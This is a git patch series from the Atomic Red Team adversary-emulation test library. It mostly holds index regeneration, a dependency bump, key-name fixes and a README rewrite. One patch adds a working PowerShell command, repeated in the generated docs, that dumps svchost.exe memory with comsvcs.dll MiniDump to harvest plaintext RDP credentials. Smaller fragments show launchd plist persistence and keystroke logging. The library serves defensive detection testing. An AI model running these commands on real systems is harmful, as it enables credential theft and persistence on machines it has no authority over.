job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1136.002/T1136.002.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2096530e..dbfd8b93 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -39975,7 +39975,7 @@ persistence: $User.DisplayName = $SamAccountName $User.Save() $User - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" ' name: powershell diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index 7ab024da..9af874c7 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -133,7 +133,7 @@ $User #### Cleanup Commands: ```powershell -net user "#{username}" >nul 2>&1 /del /domain +cmd /c "net user #{username} /del >nul 2>&1" ``` From 223584b41f29653e52bfc2464b3ed6817d329c16 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 13 Jul 2021 12:13:33 -0600 Subject: [PATCH 09/19] Bump addressable from 2.7.0 to 2.8.0 (#1549) Bumps [addressable](https://github.com/sporkmonger/addressable) from 2.7.0 to 2.8.0. - [Release notes](https://github.com/sporkmonger/addressable/releases) - [Changelog](https://github.com/sporkmonger/addressable/blob/main/CHANGELOG.md) - [Commits](https://github.com/sporkmonger/addressable/compare/addressable-2.7.0...addressable-2.8.0) --- updated-dependencies: - dependency-name: addressable dependency-type: indirect ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 68078e7a..d1f9a35d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -12,7 +12,7 @@ GEM minitest (~> 5.1) tzinfo (~> 1.1) zeitwerk (~> 2.2, >= 2.2.2) - addressable (2.7.0) + addressable (2.8.0) public_suffix (>= 2.0.2, < 5.0) coffee-script (2.4.1) coffee-script-source From d42bda32a1ac33a0f784b31596da74c43d24f043 Mon Sep 17 00:00:00 2001 From: Jay_darknight <55954468+jayaram24@users.noreply.github.com> Date: Wed, 14 Jul 2021 12:13:59 -0500 Subject: [PATCH 10/19] Dump svchost.exe to gather RDP plaintext credential (#1551) --- atomics/T1003/T1003.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index d622c125..a8d0ee53 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -85,3 +85,22 @@ atomic_tests: Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore name: powershell elevation_required: true + +- name: Dump svchost.exe to gather RDP credentials + description: | + The svchost.exe contains the RDP plain-text credentials. + Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ + + Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. + supported_platforms: + - windows + executor: + command: | + $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) + if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } + C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full + cleanup_command: | + Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore + name: powershell + elevation_required: true + From 1f82f6af1f73be17781261ceaa537462ec2e2449 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 14 Jul 2021 17:14:23 +0000 Subject: [PATCH 11/19] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003/T1003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index a8d0ee53..2d5056a3 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -87,6 +87,7 @@ atomic_tests: elevation_required: true - name: Dump svchost.exe to gather RDP credentials + auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9 description: | The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 1b4d0b87..bdecd84c 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -731,3 +731,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 5a51ef57-299e-4d62-8e11-2d440df55e69 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a +d400090a-d8ca-4be0-982e-c70598a23de9 From 4af8bae9f467a82777e06a1bc53bc76cfef407b3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 14 Jul 2021 17:14:29 +0000 Subject: [PATCH 12/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 +++++++++ atomics/T1003/T1003.md | 39 +++++++++++++++++++ 6 files changed, 62 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ea2dfdec..f2257e0e 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -55,6 +55,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cb774351..b338da52 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -39,6 +39,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 8b4533db..21b70104 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -91,6 +91,7 @@ - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] + - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows] - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - Atomic Test #1: Password Cracking with Hashcat [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index ef36826f..d85cc21e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -69,6 +69,7 @@ - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] + - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows] - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - Atomic Test #1: Password Cracking with Hashcat [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index dbfd8b93..51fee12e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4062,6 +4062,25 @@ credential-access: C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore" name: powershell elevation_required: true + - name: Dump svchost.exe to gather RDP credentials + auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9 + description: | + The svchost.exe contains the RDP plain-text credentials. + Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ + + Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. + supported_platforms: + - windows + executor: + command: | + $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) + if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } + C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full + cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore + +' + name: powershell + elevation_required: true T1110.002: technique: external_references: diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index f7c73c92..64a86e77 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -11,6 +11,8 @@ Several of the tools mentioned in associated sub-techniques may be used by both - [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy) +- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials) +
@@ -133,4 +135,41 @@ Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f +
+
+ +## Atomic Test #3 - Dump svchost.exe to gather RDP credentials +The svchost.exe contains the RDP plain-text credentials. +Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ + +Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) +if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } +C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full +``` + +#### Cleanup Commands: +```powershell +Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore +``` + + + + +
From df34cadff9d8d55afee76ee164386c001bb72358 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Mon, 19 Jul 2021 15:51:21 -0500 Subject: [PATCH 13/19] T1135 - Fixed key name in executor test (#1552) * Fixed key name of `elevation_require` to `elevation_required` --- atomics/T1135/T1135.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index ff02d0ae..09be538c 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -45,7 +45,7 @@ atomic_tests: command: | smbstatus --shares name: bash - elevation_require: true + elevation_required: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | From 6f2bf060fb3ace95967442dcc5a7f6b4f3c22859 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 19 Jul 2021 20:51:52 +0000 Subject: [PATCH 14/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1135/T1135.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 51fee12e..11363213 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -51616,7 +51616,7 @@ discovery: ' name: bash - elevation_require: true + elevation_required: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 3a6992bb..87763ed2 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -75,7 +75,7 @@ Network Share Discovery using smbstatus | package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash From b402f11979ef78074f4180a221b6cb71dc6d7bc5 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 19 Jul 2021 14:15:04 -0700 Subject: [PATCH 15/19] Update the README as per Wiki Update (#1550) Co-authored-by: Carrie Roberts --- README.md | 70 ++++++++++++++++++++----------------------------------- 1 file changed, 25 insertions(+), 45 deletions(-) diff --git a/README.md b/README.md index 0a0bc26d..507cc52d 100644 --- a/README.md +++ b/README.md @@ -1,59 +1,39 @@

# Atomic Red Team + [![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team) -Atomic Red Team allows every security team to test their controls by executing simple -"atomic tests" that exercise the same techniques used by adversaries (all mapped to -[Mitre's ATT&CK](https://attack.mitre.org)). +Atomic Red Team is library of tests mapped to the +[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use +Atomic Red Team to quickly, portably, and reproducibly test their environments. -## Philosophy +## Get started -Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are -focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks. +You can execute atomic tests directly from the command line, no installation +required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started) +page of our wiki. -Three key beliefs made up the Atomic Red Team charter: -- **Teams need to be able to test everything from specific technical controls to outcomes.** - Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know - what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we - do believe in knowing our blind spots. +For a more robust testing experience, consider using an execution framework like +[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam). -- **We should be able to run a test in less than five minutes.** - Most security tests and automation tools take a tremendous amount of time to install, configure, and execute. - We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be - run in a few minutes. +## Learn more - The best test is the one you actually run. +The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/). -- **We need to keep learning how adversaries are operating.** - Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing - their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used, - which makes the community working together essential to making us all better. +For information about the philosophy and development of Atomic Red Team, visit +our website at . -See: https://atomicredteam.io +## Contribute to Atomic Red Team -## Having trouble? +Atomic Red Team is open source and community developed. If you're interested in +becoming a contributor, check out these resources: -Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)) - -## Getting Started - -* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team) -* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework) -* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) - - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv)) - - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv)) - - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv)) -* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json)) -* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications -* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) - * Need a Slack invitation? Submit an invite request via this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link) - -## Code of Conduct - -In order to have a more open and welcoming community, Atomic Red Team adheres to a -[code of conduct](CODE_OF_CONDUCT.md). - -## License - -See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file. +- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved + with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md) + before you join. +- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose). +- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) + for more information about contributing directly to this repository. +- Check the [license](LICENSE.txt) for information regarding the distribution + and modification of Atomic Red Team. From 842a5df8795424f6f41698fed232f913e2432ad0 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Mon, 19 Jul 2021 16:19:59 -0500 Subject: [PATCH 16/19] T1056.001 - Updating dependencies (#1555) * T1056.001 - Updating dependencies Moved `prereq_command` and `get_prereq_command` under dependencies to conform to other tests * white space correction Co-authored-by: Carrie Roberts --- atomics/T1056.001/T1056.001.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 48d62471..a09fdc50 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -32,10 +32,13 @@ atomic_tests: Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. - prereq_command: | - test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so' - get_prereq_command: | - echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" + dependencies: + - description: | + Checking if pam_tty_audit.so is installed + prereq_command: | + test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so' + get_prereq_command: | + echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" supported_platforms: - linux executor: From 0f8eb34b74957c986d0d8e7212ba52f9a7771bc2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 19 Jul 2021 21:20:24 +0000 Subject: [PATCH 17/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 20 ++++++++++++++------ atomics/T1056.001/T1056.001.md | 12 ++++++++++++ 2 files changed, 26 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 11363213..3adf9eda 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2522,11 +2522,15 @@ credential-access: 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. \n" - prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + dependencies: + - description: 'Checking if pam_tty_audit.so is installed ' - get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and - recompile, for this test to work" + prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + +' + get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so + and recompile, for this test to work" ' supported_platforms: @@ -7976,11 +7980,15 @@ collection: 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. \n" - prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + dependencies: + - description: 'Checking if pam_tty_audit.so is installed ' - get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and - recompile, for this test to work" + prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + +' + get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so + and recompile, for this test to work" ' supported_platforms: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index 76f5881a..88c11054 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -93,6 +93,18 @@ sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth +#### Dependencies: Run with `sh`! +##### Description: Checking if pam_tty_audit.so is installed +##### Check Prereq Commands: +```sh +test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so' +``` +##### Get Prereq Commands: +```sh +echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" +``` + +
From 9d2212bd206cd4a3617d36a6ae2ee204524a8272 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Mon, 19 Jul 2021 16:21:15 -0500 Subject: [PATCH 18/19] T1543.004 - Updated cleanup key (#1553) Updated the key `cleanup` to `cleanup_command` to conform to other tests. Co-authored-by: Carrie Roberts --- atomics/T1543.004/T1543.004.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml index 7e4b5428..27adc319 100644 --- a/atomics/T1543.004/T1543.004.yaml +++ b/atomics/T1543.004/T1543.004.yaml @@ -32,7 +32,7 @@ atomic_tests: command: | sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | + cleanup_command: | sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} From 4ab80721acb45fdfb98b30bc6b2e623595cabcdc Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 19 Jul 2021 21:21:58 +0000 Subject: [PATCH 19/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1543.004/T1543.004.md | 5 +++++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3adf9eda..4f451fdb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -13588,7 +13588,7 @@ privilege-escalation: command: | sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | + cleanup_command: | sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} T1053.004: @@ -41610,7 +41610,7 @@ persistence: command: | sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | + cleanup_command: | sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} T1053.004: diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index d3aaeda3..b9992d60 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -40,6 +40,11 @@ sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} ``` +#### Cleanup Commands: +```bash +sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} +sudo rm /Library/LaunchDaemons/#{plist_filename} +```